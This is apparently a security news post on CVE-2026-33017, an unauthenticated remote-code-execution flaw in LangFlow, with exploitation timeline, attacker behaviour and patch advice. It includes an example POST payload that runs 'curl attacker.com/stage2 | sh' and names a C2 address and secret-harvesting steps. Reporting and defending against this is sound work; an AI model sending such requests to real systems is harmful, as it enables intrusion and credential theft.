LangFlow's CVE-2026-33017 was already being exploited within 20 hours of disclosure
Contents
A CVSS 9.3 unauthenticated RCE in LangFlow was reported, and real-world exploitation was confirmed only 20 hours after public disclosure.
What LangFlow is
LangFlow is an open-source LLM application builder built on top of LangChain. It lets you construct AI pipelines through a visual flow editor where you connect nodes by dragging and dropping them. Because it is easy to build RAG pipelines and AI agents visually, it is widely adopted in both enterprise and developer LLMOps stacks. The problem is that many LangFlow instances are exposed to the internet.
Vulnerability details
CVE-2026-33017 exists in /api/v1/build_public_tmp/{flow_id}/flow. That endpoint lets public flows be built without authentication, but when it accepts the optional data parameter, it executes arbitrary Python code embedded in the flow definition.
POST /api/v1/build_public_tmp/{flow_id}/flow
Content-Type: application/json
{
"data": {
"nodes": [
{
"type": "CustomComponent",
"data": {
"node": {
"template": {
"code": {
"value": "import os; os.system('curl attacker.com/stage2 | sh')"
}
}
}
}
}
]
}
}A single HTTP POST request is enough to run arbitrary code. No auth token and no CSRF token are required.
The root cause is an un-sandboxed exec() call, and it shares the same code path as CVE-2025-3248. CVE-2025-3248 affected an authenticated endpoint, but this endpoint has no authentication at all. Aviral Srivastava, who found and reported the bug, summarized the structural problem clearly: adding authentication would break the public-flow feature. The architecture needed sandboxing or removal of code execution, not just another access check.
| Item | Details |
|---|---|
| CVE ID | CVE-2026-33017 |
| CVSS score | 9.3 (Critical) |
| Affected versions | All versions up to v1.8.1 |
| Fixed version | 1.9.0.dev8 (development build) |
| Vulnerability type | Missing authentication + code injection |
| Reporter | Aviral Srivastava (reported on 2026-02-26) |
| Public disclosure | 2026-03-17 |
| Real-world exploitation | 2026-03-17, within 20 hours of disclosure |
How the attacks unfolded
Public disclosure happened on March 17, 2026. That same day, cloud security company Sysdig observed active exploitation.
The key detail is that no PoC existed at disclosure time. Attackers built a working exploit from the advisory alone and immediately began scanning the internet. Today, automated scanning is so fast that zero-day exploitation without a public PoC is no longer unusual.
The campaign progressed in stages: first simple HTTP POST probes to check execution, then payload delivery from the attacker C2 server (173.212.205[.]251:8443). Reconnaissance activity typical of an infostealer was also seen: reading /etc/passwd and extracting environment variables, configuration files, and .env files. The goal appears to have been collecting database passwords and API keys for the next stage of the attack.
flowchart TD
A[CVE-2026-33017 disclosed<br/>2026-03-17] --> B[No PoC needed<br/>exploit built from the advisory]
B --> C[Internet-wide scanning starts<br/>within 20 hours]
C --> D[Simple HTTP POST probes<br/>check whether execution is possible]
D --> E[Successful exploitation]
E --> F[C2 connection<br/>173.212.205.251:8443]
E --> G[Reconnaissance phase]
F --> H[Receive the next-stage payload]
G --> I[Read /etc/passwd]
G --> J[Extract environment variables and .env files]
G --> K[Collect config files]
I & J & K --> L[Credential theft and malware deployment prep]How to respond
Upgrading to development build 1.9.0.dev8 is the highest priority. If you want to wait for a stable release, keep the LangFlow instance off the internet until then.
If the system was already exposed publicly, assume compromise.
- Rotate all API keys, database passwords, and LLM provider keys
- Investigate suspicious outbound connections, especially on port 8443
- Check logs for unauthorized access to
.envfiles and environment variables - If running in containers, rebuild and redeploy the image
The urgency is lower if LangFlow is only used locally, but environments reachable through VPNs or bastions should still be treated as internet-exposed.
According to Rapid7’s 2026 Global Threat Landscape report, organizations take about 20 days on average to patch. This time, attacks started within 20 hours. Tools with exec()-based flow engines are inherently attractive targets, so any public deployment of this type of tool deserves a review.